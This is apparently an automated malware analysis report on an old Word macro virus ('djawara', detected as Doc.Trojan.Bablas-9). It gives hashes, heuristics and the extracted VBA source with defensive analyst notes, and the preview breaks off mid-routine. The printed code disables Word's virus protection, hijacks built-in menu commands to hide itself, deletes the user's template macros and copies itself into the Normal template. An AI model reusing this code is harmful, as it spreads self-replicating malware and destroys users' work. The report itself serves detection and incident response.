Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb1a690dd1e2540d…

MALICIOUS

Office (OLE)

96.0 KB Created: 2001-07-02 13:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8d7b12ca04bfa345d0fefd3a9f5d4df7 SHA-1: 54849f816771771a29b89785b475b9c1abfe0cf4 SHA-256: cb1a690dd1e2540d2872222548a5387f57b0ef98affa5934283f95df4e057a29
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

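The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose, indicating a macro-based attack. The 'djawara' macro names and comments suggest custom malware. The 'Lewat' subroutine disables Word's macro virus protection and the save prompts, so later changes (including changes to the Normal template) are not announced to the user, facilitating further execution. The 'ToolsMacro' subroutine displays a misleading error message to the user; because it is named after a built-in Word command, it runs in place of the Tools > Macro dialog and keeps the user away from the macro list.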

Heuristics 5

  • ClamAV: Doc.Trojan.Bablas-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bablas-9
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6522 bytes
SHA-256: 28f1651fc54a4dfb9e680f338e0a1370207b7fb1c96a59d315e90060973cd1d8
Detection
ClamAV: Doc.Trojan.Bablas-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "djawara"
' djwara macros ... this my first macros
' thank to my company office for editing this garbage
' see you in my next macros project
' may be i will call it bye windows .... :)
' [analyst note] Stub whose only statement is an unfinished member access
' (nothing follows the trailing dot). As extracted it is not valid VBA; whether
' that is how the author left it or an extraction artifact cannot be told from
' this preview.
Sub header()
Application.ActiveDocument.
End Sub
' [analyst note] Defense-impairment helper. Switches off three Word options:
'   - SaveNormalPrompt: the prompt shown before changes to the Normal template are saved
'   - VirusProtection: Word's built-in macro warning when opening documents
'   - SavePropertiesPrompt: the document-properties prompt on save
' Called again at the end of ToolsOptions in this module. During triage, these
' three options being off together is worth checking on an affected host.
Sub Lewat()
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
End Sub
' [analyst note] Shares its name with Word's built-in ToolsMacro command. A macro
' named after a built-in command runs in place of that command, so opening
' Tools > Macro shows this fake error box instead of the macro list.
' The message text is a stable string indicator for this sample.
Sub ToolsMacro()
    H = MsgBox("Error Loading Failed.Sys, Please Read Manual.hlp", vbExclamation + vbOKOnly)
End Sub
' [analyst note] Name matches Word's built-in ViewVBCode command, so it is
' expected to run in its place. The Visual Basic Editor is shown only when the
' InputBox answer equals a hard-coded literal; any other answer does nothing.
' Same body as OpenMyMacro.
Sub ViewVbCode()
    If InputBox("Enter Lewatword", "djawara") = "tempe" Then Application.ShowVisualBasicEditor = True
End Sub
' [analyst note] Name matches Word's built-in FileTemplates command (the
' Templates and Add-ins dialog). Instead of opening that dialog it calls this
' module's ToolsMacro, which only shows the fake error box.
Sub FileTemplates()
    ToolsMacro
End Sub
' [analyst note] Name matches Word's built-in HelpAbout command. Shows the
' FormSingkat user form; that form's contents are not part of this preview.
Sub HelpAbout()
    FormSingkat.Show
End Sub
' [analyst note] Overwrites the application and active-window title bars with
' fixed strings; errors are suppressed (for example when no window is open).
' Cosmetic only - no file or setting is modified here. BalikinTitle sets the
' captions back. The caption string is a visible indicator for users.
Sub GantiTitle()
    On Error Resume Next
    Application.Caption = "djawara in Action"
    ActiveWindow.Caption = "..."
End Sub
' [analyst note] Name matches Word's built-in ToolsOptions command, so it is
' expected to run in place of Tools > Options. It sets the three options back
' to True first, so the real dialog shows them as enabled, then displays the
' dialog, then calls Lewat to turn all three off again. Net effect: the user
' sees protective settings as on, and any change made to these three in the
' dialog is undone when it closes.
Sub ToolsOptions()
    Options.SaveNormalPrompt = True
    Options.SavePropertiesPrompt = True
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    Lewat
End Sub
' [analyst note] Counterpart of GantiTitle: sets the application caption to
' "Microsoft Word" and the window caption to the active document's name, with
' errors suppressed.
Sub BalikinTitle()
    On Error Resume Next
    Application.Caption = "Microsoft Word"
    ActiveWindow.Caption = ActiveDocument.Name
End Sub
' [analyst note] Shows a message box when the current time falls inside one of
' five fixed windows; the author's comments label them with prayer names and
' the Indonesian text appears to be a reminder to pray first and continue
' later (translation not verified). Nothing else happens here: no file,
' setting or template is touched. The first assignment to H is overwritten or
' unused. The dialog title "[djawara auto warning]" is a string indicator.
Sub PrayerTime()
    H = Time
    Select Case Time
     Case "04:30:00" To "04:40:00" 'shubuh
       H = MsgBox("Sholat Shubuh dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "11:50:00" To "12:00:00" 'dhuhur
       H = MsgBox("Sholat dhuhur dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "15:20:00" To "15:30:00" 'ashar
       H = MsgBox("Sholat ashar dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "17:50:00" To "18:00:00" 'magrib
       H = MsgBox("Sholat maghrib dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
     Case "18:40:00" To "19:00:00" 'isya
       H = MsgBox("Sholat isya' dahulu .... nanti terusin lagi", vbOKOnly + vbExclamation, "[djawara auto warning]")
    End Select
End Sub
' [analyst note] Same body as ViewVbCode: the Visual Basic Editor is shown only
' when the InputBox answer equals the hard-coded literal. No caller is visible
' in this preview.
Sub OpenMyMacro()
    If InputBox("Enter Lewatword", "djawara") = "tempe" Then Application.ShowVisualBasicEditor = True
End Sub
' [analyst note] Normal-template infection routine. Two effects, both visible below:
'   1. Every VB component in the Normal template that is not named djawara,
'      FormSingkat or ThisDocument is deleted through the Organizer, so the
'      user's own global macros are lost.
'   2. If no component named djawara was found, the djawara module and the
'      FormSingkat form are copied from the active document into the Normal
'      template, so the code is present in every later Word session.
' Response implication: cleaning the document alone is not enough; the Normal
' template on the host has to be inspected or replaced as well. The routine
' needs programmatic access to VBProject, which later Office versions block
' unless "Trust access to the VBA project object model" is enabled.
' The status-bar strings below are usable as content indicators.
Sub OverRideTemplate()
    Dim NorOk As Boolean
    NorOk = False
    For Each Obj In NormalTemplate.VBProject.VBComponents
        ' Remember whether the template already carries the djawara module.
        If Obj.Name = "djawara" Then NorOk = True
        ' Anything outside the three allowed names is removed from the template.
        If Obj.Name <> "djawara" And Obj.Name <> "FormSingkat" And Obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + Obj.Name + _
            " Your Clean File Template,... Please Wait"
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    If NorOk = False Then
        ' Template not yet infected: copy the module and its form from the open document.
        Application.StatusBar = "Copying djawara From " + ActiveDocument.Name + _
        " to Normal Template,... Please Wait"
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="djawara", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="FormSingkat", Object:=wdOrganizerObjectProjectItems
        ' Recent-files display is switched off and straight back on; the purpose
        ' is not evident from the code shown.
        Application.DisplayRecentFiles = False
        Application.DisplayRecentFiles = True
    End If
End Sub
Sub OverRideDocument()
    Dim DocOk As Boolean
    
    
    DocOk = False
        For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name = "djawara" Then DocOk = True
        If Obj.Name <> "djawara" And Obj.Name <> "FormSingkat" And Obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + Obj.Name + _
            " Macro in " + Active
... (truncated)